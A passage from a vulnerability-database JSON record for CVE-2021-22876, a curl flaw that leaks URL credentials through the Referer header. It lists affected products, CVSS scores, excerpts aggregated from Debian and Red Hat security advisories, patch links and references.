        "vendor": "oracle",
        "version": "12.0.0.3.0"
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "9.1.0"
      },
      {
        "_id": null,
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "_id": null,
        "model": "universal forwarder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "splunk",
        "version": "8.2.12"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "_id": null,
        "model": "essbase",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "21.2"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.75.0"
      },
      {
        "_id": null,
        "model": "libcurl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "haxx",
        "version": "7.1.1"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "165288"
      },
      {
        "db": "PACKETSTORM",
        "id": "164886"
      },
      {
        "db": "PACKETSTORM",
        "id": "166309"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "166051"
      },
      {
        "db": "PACKETSTORM",
        "id": "165096"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165758"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2021-22876",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2021-22876",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 3.9,
            "id": "CVE-2021-22876",
            "impactScore": 1.4,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-22876",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2021-22876",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-22876",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22876"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "curl 7.1.1 to and including 7.75.0 is vulnerable to an \"Exposure of Private Personal Information to an Unauthorized Actor\" by leaking credentials in the HTTP Referer: header. libcurl does not strip off user credentials from the URL when automatically populating the Referer: HTTP request header field in outgoing HTTP requests, and therefore risks leaking sensitive data to the server that is the target of the second HTTP request. This could lead to exposure of the credentials to the server to which requests were redirected. (CVE-2021-22876)\nA vulnerability was found in curl where a flaw in the option parser for sending NEW_ENV variables libcurl can pass uninitialized data from a stack-based buffer to the server. This issue leads to potentially revealing sensitive internal information to the server using a clear-text network protocol. The highest threat from this vulnerability is to confidentiality. (CVE-2021-22898). \n\nCVE-2020-8177\n\n    sn reported that curl could be tricked by a malicious server into\n    overwriting a local file when using th -J (--remote-header-name) and\n    -i (--include) options in the same command line. \n\nCVE-2020-8231\n\n    Marc Aldorasi reported that libcurl might use the wrong connection\n    when an application using libcurl\u0027s multi API sets the option\n    CURLOPT_CONNECT_ONLY, which could lead to information leaks. \n\nCVE-2020-8284\n\n    Varnavas Papaioannou reported that a malicious server could use the\n    PASV response to trick curl into connecting back to an arbitrary IP\n    address and port, potentially making curl extract information about\n    services that are otherwise private and not disclosed. \n\nCVE-2020-8285\n\n    xnynx reported that libcurl could run out of stack space when using\n    tha FTP wildcard matching functionality (CURLOPT_CHUNK_BGN_FUNCTION). \n\nCVE-2020-8286\n\n    It was reported that libcurl didn\u0027t verify that an OCSP response\n    actually matches the certificate it is intended to. \n\nCVE-2021-22890\n\n    Mingtao Yang reported that, when using an HTTPS proxy and TLS 1.3,\n    libcurl could confuse session tickets arriving from the HTTPS proxy\n    as if they arrived from the remote server instead. This could allow\n    an HTTPS proxy to trick libcurl into using the wrong session ticket\n    for the host and thereby circumvent the server TLS certificate check. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 7.64.0-4+deb10u2. \n\nWe recommend that you upgrade your curl packages. \n\nFor the detailed security status of curl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/curl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAmBkQCoACgkQbwzL4CFi\nRyg6Gg/+LqhhJ8+D7skevVkYzxHzdH2yT/XMeoYp0D37yHmEfH9PyjXwfplG+XEw\n/xwFRBK8qxD1ja+rQddYyeTvi1OMnMgMS3UsRHlfeMnLxh2+oHnvHDYG848npUEZ\nRq4YFoc/n9YTAJZP/G4oiuBeXqH2Sqa5hSNT6VrYfRciCxkYnzA78b85KpI8aYyR\nlhfiJMNpwrqDbt/QzblpELBkGMIV402VeiqDwHfcVzm2E810xXQNLvPMbWtvDYkA\nTSrNsdqfuFr1tuQSZY6CGSWEyXtB/tOo8+pvUixlJMBWJMl5TXEcJkD5ckehx0yb\nC3n9yapfklxHiG9lD4zwwIJDqd3Y4SxdDiSlUC4OhdvpwniMygX0S3ICaPA4iac/\ncWanml0Fop3OmRy+vQURTd3sADoT5HoRSUXZVU+HdTrRaEt2xs5okZkWSd3yr4Ux\ni+HgjUAFkkk8DLRB68Bbpx1LGxFGQT7L8yd4wsWINXlzASIP1A5dnNfE5w0VWOHG\n3KDq47wNfjuiZC8GXW+HQCxz5MijnS8Y/Egl0OozNFDwEitNBZEsIjpZaZBdZIwi\nUFfcK7+u/y/TRY54rA4erkdcHFwpYW5EZVGdb7Z+WPWVlzw0ImXrM68LSAhHQaqW\n1Hx4VwwwTsMIPnrx2kriRiiDPOW1r5Kip3yHa+QZLedSRGibQWk=\n=001T\n-----END PGP SIGNATURE-----\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n1944888 - CVE-2021-21409 netty: Request smuggling via content-length header\n2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data\n2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn\u0027t restrict chunk length and may buffer skippable chunks in an unnecessary way\n2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1897 - Applying cluster state is causing elasticsearch to hit an issue and become unusable\nLOG-1925 - [release-5.3] No datapoint for CPU on openshift-logging dashboard\nLOG-1962 - [release-5.3] CLO panic: runtime error: slice bounds out of range [:-1]\n\n6. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 8. Relevant releases/architectures:\n\nRed Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: Leak of authentication credentials in URL via automatic Referer\n(CVE-2021-22876)\n\n* curl: TELNET stack contents disclosure (CVE-2021-22898)\n\n* curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure\n(CVE-2021-22925)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.5 Release Notes linked from the References section. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1941964 - CVE-2021-22876 curl: Leak of authentication credentials in URL via automatic Referer\n1947493 - Why there is a difference between curl --head output on the RHEL7 and RHEL8. \n1964887 - CVE-2021-22898 curl: TELNET stack contents disclosure\n1970902 - CVE-2021-22925 curl: Incorrect fix for CVE-2021-22898 TELNET stack contents disclosure\n\n6. Package List:\n\nRed Hat Enterprise Linux BaseOS (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. \n\nClusters and applications are all visible and managed from a single console\n\u2014 with security policy built in. See the following Release Notes documentation, which\nwill be updated shortly for this release, for additional details about this\nrelease:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/\n\nSecurity updates:\n\n* object-path: Type confusion vulnerability can lead to a bypass of\nCVE-2020-15256 (CVE-2021-23434)\n\n* follow-redirects: Exposure of Private Personal Information to an\nUnauthorized Actor (CVE-2022-0155)\n\nRelated bugs: \n\n* RHACM 2.2.11 images (Bugzilla #2029508)\n\n* ClusterImageSet has 4.5 which is not supported in ACM 2.2.10 (Bugzilla\n#2030859)\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: Gatekeeper Operator v0.2 security updates and bug fixes\nAdvisory ID:       RHSA-2022:1081-01\nProduct:           Red Hat ACM\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:1081\nIssue date:        2022-03-28\nCVE Names:         CVE-2019-5827 CVE-2019-13750 CVE-2019-13751\n                   CVE-2019-17594 CVE-2019-17595 CVE-2019-18218\n                   CVE-2019-19603 CVE-2019-20838 CVE-2020-12762\n                   CVE-2020-13435 CVE-2020-14155 CVE-2020-16135\n                   CVE-2020-24370 CVE-2021-3200 CVE-2021-3445\n                   CVE-2021-3521 CVE-2021-3580 CVE-2021-3712\n                   CVE-2021-3800 CVE-2021-3999 CVE-2021-20231\n                   CVE-2021-20232 CVE-2021-22876 CVE-2021-22898\n                   CVE-2021-22925 CVE-2021-23177 CVE-2021-28153\n                   CVE-2021-31566 CVE-2021-33560 CVE-2021-36084\n                   CVE-2021-36085 CVE-2021-36086 CVE-2021-36087\n                   CVE-2021-42574 CVE-2021-43565 CVE-2022-23218\n                   CVE-2022-23219 CVE-2022-23308 CVE-2022-23806\n                   CVE-2022-24407\n====================================================================\n1. Summary:\n\nGatekeeper Operator v0.2\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nGatekeeper Operator v0.2\n\nGatekeeper is an open source project that applies the OPA Constraint\nFramework to enforce policies on your Kubernetes clusters. \n\nThis advisory contains the container images for Gatekeeper that include\nsecurity updates, and container upgrades. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\nNote: Gatekeeper support from the Red Hat support team is limited cases\nwhere it is integrated and used with Red Hat Advanced Cluster Management\nfor Kubernetes. For support options for any other use, see the Gatekeeper\nopen source project website at:\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/. \n\nSecurity updates:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThe requirements to apply the upgraded images are different whether or not\nyou\nused the operator. Complete the following steps, depending on your\ninstallation:\n\n- - Upgrade gatekeeper operator:\nThe gatekeeper operator that is installed by the gatekeeper operator policy\nhas\n`installPlanApproval` set to `Automatic`. This setting means the operator\nwill\nbe upgraded automatically when there is a new version of the operator. No\nfurther action is required for upgrade. If you changed the setting for\n`installPlanApproval` to `manual`, then you must view each cluster to\nmanually\napprove the upgrade to the operator. \n\n- - Upgrade gatekeeper without the operator:\nThe gatekeeper version is specified as part of the Gatekeeper CR in the\ngatekeeper operator policy. To upgrade the gatekeeper version:\na) Determine the latest version of gatekeeper by visiting:\nhttps://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. \nb) Click the tag dropdown, and find the latest static tag. An example tag\nis\n\u0027v3.3.0-1\u0027. \nc) Edit the gatekeeper operator policy and update the image tag to use the\nlatest static tag. For example, you might change this line to image:\n\u0027registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1\u0027. \n\nRefer to https://open-policy-agent.github.io/gatekeeper/website/docs/howto/\nfor additional information. \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-5827\nhttps://access.redhat.com/security/cve/CVE-2019-13750\nhttps://access.redhat.com/security/cve/CVE-2019-13751\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-19603\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-12762\nhttps://access.redhat.com/security/cve/CVE-2020-13435\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-16135\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2021-3200\nhttps://access.redhat.com/security/cve/CVE-2021-3445\nhttps://access.redhat.com/security/cve/CVE-2021-3521\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3712\nhttps://access.redhat.com/security/cve/CVE-2021-3800\nhttps://access.redhat.com/security/cve/CVE-2021-3999\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-22876\nhttps://access.redhat.com/security/cve/CVE-2021-22898\nhttps://access.redhat.com/security/cve/CVE-2021-22925\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-28153\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-33560\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-42574\nhttps://access.redhat.com/security/cve/CVE-2021-43565\nhttps://access.redhat.com/security/cve/CVE-2022-23218\nhttps://access.redhat.com/security/cve/CVE-2022-23219\nhttps://access.redhat.com/security/cve/CVE-2022-23308\nhttps://access.redhat.com/security/cve/CVE-2022-23806\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://open-policy-agent.github.io/gatekeeper/website/docs/howto/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYkHUf9zjgjWX9erEAQiizw//XXMOXR1Xe/Fp6uV2DCknXEAWJbYuGV43\n9a87QSq5ob3vbqGGXQXLU6ENjFtAx37/+5+UqAVbzcj+LQ0lV6Ny9rVzolDT4ltG\nk7J/BUd/kyr9G5gbiih3D/tm8dLh/rLft8FKgB+hEw+NcXnFlEvW5iEymqAsyH/D\nmrcgCrASFoWG4S4/JC+g8r1TRHAJj4ERAy4ZpDqn/eoOWY3jD+rPv1VD5Z+XaE07\n+jw+mvZukP2l0374Yn3W+g7uVOZ5RSqSpEzBZoSy3ffYAqpK+oQ7eN19DOW7l3tr\nKo/4h4OmLcOtIRedyt86xJe+zY7Ovo1cRP1TUgRapZGpTCPjaQ/okOhAIh03uxrx\nceCawNnagBB1iglJl29GNRUUUU0JWhbEPDLepSjfsyOwkJxvtUulC/W+RJVfpE7Q\nLimNdHDJbFWN1x4IujdJNOCjPnBj6sG84PxLIjx5hM07ARRCBfrHutmlBm6Aq8Ej\nmcNPudtyufYuAqcNx8Pe04kwRmzeukNm/qVvr+ywG1+Rp4yo3mkxplZY+5z7S2sH\nvsciDeEGg6CAh7Sm/zfN3fpvNei1WhzcSxKsHMLB40ASJU2sMe1tt9b2pPhaHfXK\nlYnIN38GSqlQUjvb1jy8ymzOT3+73uCjYQrVbsGXoevb1639pasWv5i9dyx27kPb\n1PnhEG7/jO4=XPu4\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files\n\n5. \nRed Hat OpenShift Container Storage is highly scalable, production-grade\npersistent storage for stateful applications running in the Red Hat\nOpenShift Container Platform. In addition to persistent storage, Red Hat\nOpenShift Container Storage provides a multicloud data management service\nwith an S3 compatible API. \n\nBug Fix(es):\n\n* Previously, when the namespace store target was deleted, no alert was\nsent to the namespace bucket because of an issue in calculating the\nnamespace bucket health. With this update, the issue in calculating the\nnamespace bucket health is fixed and alerts are triggered as expected. \n(BZ#1993873)\n\n* Previously, the Multicloud Object Gateway (MCG) components performed\nslowly and there was a lot of pressure on the MCG components due to\nnon-optimized database queries. With this update the non-optimized\ndatabase queries are fixed which reduces the compute resources and time\ntaken for queries. Bugs fixed (https://bugzilla.redhat.com/):\n\n1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore\u0027s target bucket is deleted\n2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input\n\n5. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution\n2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport)\n2006842 - MigCluster CR remains in \"unready\" state and source registry is inaccessible after temporary shutdown of source cluster\n2007429 - \"oc describe\" and \"oc log\" commands on \"Migration resources\" tree cannot be copied after failed migration\n2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet\n1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nTRACING-2235 - Release RHOSDT 2.1\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22876"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "165288"
      },
      {
        "db": "PACKETSTORM",
        "id": "164886"
      },
      {
        "db": "PACKETSTORM",
        "id": "166309"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "166051"
      },
      {
        "db": "PACKETSTORM",
        "id": "165096"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165758"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-22876",
        "trust": 2.0
      },
      {
        "db": "HACKERONE",
        "id": "1101882",
        "trust": 1.0
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22876",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169015",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165288",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164886",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166309",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166489",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166051",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165096",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165099",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "165758",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22876"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "165288"
      },
      {
        "db": "PACKETSTORM",
        "id": "164886"
      },
      {
        "db": "PACKETSTORM",
        "id": "166309"
      },
      {
        "db": "PACKETSTORM",
        "id": "166489"
      },
      {
        "db": "PACKETSTORM",
        "id": "166051"
      },
      {
        "db": "PACKETSTORM",
        "id": "165096"
      },
      {
        "db": "PACKETSTORM",
        "id": "165099"
      },
      {
        "db": "PACKETSTORM",
        "id": "165758"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      }
    ]
  },
  "id": "VAR-202104-0334",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2026-03-09T22:32:03.190000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2021-22876",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=dc9338ed355a659e53e38756033db037"
      },
      {
        "title": "Red Hat: Moderate: rh-dotnet31-curl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221354 - Security Advisory"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2021-1509",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1509"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1653",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1653"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22876 log"
      },
      {
        "title": "Debian Security Advisories: DSA-4881-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a9706a30f62799ecc4d45bdb53c244eb"
      },
      {
        "title": "Red Hat: Moderate: Release of OpenShift Serverless 1.20.0",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220434 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat OpenShift distributed tracing 2.1.0 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220318 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Release of containers for OSP 16.2 director operator tech preview",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220842 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221081 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220580 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.2.11 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20220856 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.5.4 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221396 - Security Advisory"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=4a9822530e6b610875f83ffc10e02aba"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "clair-client",
        "trust": 0.1,
        "url": "https://github.com/indece-official/clair-client "
      },
      {
        "title": "myapp-container-jaxrs",
        "trust": 0.1,
        "url": "https://github.com/akiraabe/myapp-container-jaxrs "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22876"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-359",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-200",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22876"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.0,
        "url": "https://security.gentoo.org/glsa/202105-36"
      },
      {
        "trust": 1.0,
        "url": "https://hackerone.com/reports/1101882"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/itvwpvglfisu5bjc2bxbrysdxtxe2ygc/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/05/msg00019.html"
      },
      {
        "trust": 1.0,
        "url": "https://curl.se/docs/cve-2021-22876.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kquioyx2kuu6fiuzvb5wwz6jhssysqwj/"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20210521-0007/"
      },
      {
        "trust": 1.0,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2zc5bmioklbqjsfchedn2g2c2sh274bp/"
      },
      {
        "trust": 1.0,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.8,
